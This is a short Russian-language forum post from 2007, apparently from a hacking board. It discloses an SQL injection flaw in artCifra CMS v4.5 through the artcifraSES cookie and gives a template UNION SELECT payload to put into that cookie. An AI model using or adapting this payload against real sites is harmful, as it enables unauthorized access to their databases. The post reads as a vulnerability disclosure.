Показать сообщение отдельно

  #38  
Старый 03.11.2007, 04:02
Аватар для phol1eadeux
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

artCifra CMS v4.5
Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции.
Пример:
Изменяем содержимое куки на:
Код:
')+union+select+column1,column2+from+some_table
 
Ответить с цитированием